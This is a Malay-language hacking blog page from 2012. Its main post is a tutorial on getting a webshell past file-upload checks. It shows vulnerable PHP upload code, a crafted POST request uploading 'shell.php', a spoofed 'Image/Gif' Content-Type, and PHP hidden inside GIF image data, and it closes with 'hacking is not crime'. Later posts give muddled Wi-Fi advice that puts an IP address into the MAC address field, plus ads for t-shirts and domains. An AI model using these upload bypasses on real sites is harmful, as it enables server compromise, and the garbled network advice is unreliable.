Saturday, 13 October 2012

CARA NAK UPLOAD WEBSHELL BYPASS SECURITY PART 1




 

Aku terangkan cara untuk bypass untuk upload shell.
korang da dapat bukak website yg ade tempat untuk upload dokumen atau gambar.

code di bawah code asas untuk upload file HTML.

<form name=upload action=upload.php method=post>
   upload a file : <input type=file name=fileName >
   <input type=submit name=upload>
</form>


dari sini boleh upload teros shell.


Content type verification
selalu nye yang jenis nie dalam upload.php utk upload file teks biase dan php x akan upload.


       <?php
      //checks if file is Gif or not 
       if($_FILES['userfile']['type'] != "image/gif")  
       {
          echo "Sorry, we only allow uploading GIF images";
          exit;
       }
      $uploaddir = 'uploads/';
      $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
      if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) 
   {
          echo "File is valid, and was successfully uploaded.n";
   } 
   else
    {
          echo "File uploading failed.n";
    }
   ?>


code kat atas utk cek file sama ade gif atau tak



"
   POST /upload2.php HTTP/1.1
   TE: deflate,gzip;q=0.3
   Connection: TE, close
   Host: localhost
   User-Agent: libwww-perl/5.803
   Content-Type: multipart/form-data; boundary=xYzZY
   Content-Length: 156
   --xYzZY
   Content-Disposition: form-data; name="userfile"; filename="shell.php"
   Content-Type: text/plain 

"

code akan cek file. kalau bukan gif file tak akan di upload.

Sekarang kte boleh bypass protection dgn gunakan program
spt Perl atau form data temper plugin di firefox.

contoh :
"Content-Type" => "Image/Gif"
ni akan buat file upload dan korang boleh access dengan

http://www.contoh.com/uploads/shell.php

IMAGE CONTECT VERIFICATION
jenis nie, ia akan kandungan file yg di upload mempunyai script atau tak.

code :


<?php
 $imageinfo = getimagesize($_FILES['userfile']['tmp_name']); //check image size
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') 
{
    echo "Sorry, we only accept GIF and JPEG imagesn";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.n";
} else {
    echo "File uploading failed.n";
}
?>




code di atas fungsi php GetImageSize kembalikan size dan image

Sekarang cara bypass jenis nie korang boleh gunakan program seperti
GIMP utk tanam script php dalam data imej file binary.
bila upload korang tengok file image tu mmg image yg sah tapi jurubahasa php nampak
file dalam tu ade script php.
oleh itu walaupun kte extension shell untuk php dan bile proses file name verification xde.
file akan upload sbg GI atau image.

contoh :
http://www.contoh.com.upload.shell.gif
akan tunjukkan file image yg btol (walaupun ade shell di tanam dalam data image)

dan
http://www.contoh.com/upload/shell.php
akan keluar shell  (di upload sbg file php shj)

sampai sini dulu.. bersambung kemudian..
hacking is not crime..
hahaha

Friday, 12 October 2012

CARA NAK SAVE IP WIFI





1. korang kne connect dulu
2. lepas tu korang right klik kat korang pnye wifi.. klik status..
akan keluar macam nie..


3. korang klik kat detail
tulisan highlight warna kuning tu ip wifi korang
korang copy letak kt notepad ke mne2 asalkan senang nk ingat


4. ok lepas tu 
korang pergi control panel > network and sharing center
lepas tu klik manage wireless network

5. korang klik kat wifi korang lepas tu klik adapter properties
akan keluar macam nie.


korang klik configure . lepastu pergi kat advance


korang cari locally administered mac address..
letak no ip kat value.. 

SELAMAT MENCUBA





Wednesday, 10 October 2012

DAPATKAN T-SHIRT ANONYMOUS

TERHAD UNTUK 20 ORANG SAHAJA


SAPE YANG NK ORDER BOLEH PM AKU DI FACEBOOK
ATAU DI WEB RASMI LOCEW DESIGN

boleh pergi ke link ni untuk pertanyaan

Tuesday, 2 October 2012

UDC DOMAIN RESELLER (PM ME)





ASSALAMUALAIKUM DAN SALAM SEJAHTERA KEPADA PEMBACA SEKALIAN....OK..
KITE DIRECT TERUS KEPADA POINT KITA.....HEHEHE


KEPADA SESIAPA YANG INGIN MEMBELI DOMAIN ANDA BOLEH CONTACT DIRECT TERUS PADA SAYA DI FACEBOOK  Porenjes Itam (S a c)...

AKU ADE ONLINE JE...WALAUPUN CHAT OFFLINE...HOHO..KALO XDE REPLY MMG TAK ONLINE LA TU...BOLEH PULA CONTACT OWNER DI FACEBOOK Underdeath Hc...

KORANG JUGAK BOLEH DIRECT TERUS REGISTER KAT SINI

HARGA TELAH DITETAPKAN SEKALI DI SITU...ANDA BOLEH RUJUK HARGA DOMAIN DI SITU....:)JIKA ADA SEBARANG PERTANYAAN BOLEH LA CONTACT DIRECT TERUS KAT KAMI...:) TERIMA KASIH...

CARA PEMBAYARAN.
korang boleh bank in ke maybank.


account number : 162076636225 (Nur Ulul Azmi)

sms kan maklumat pembayaran ke 010-2181901




Recent Posts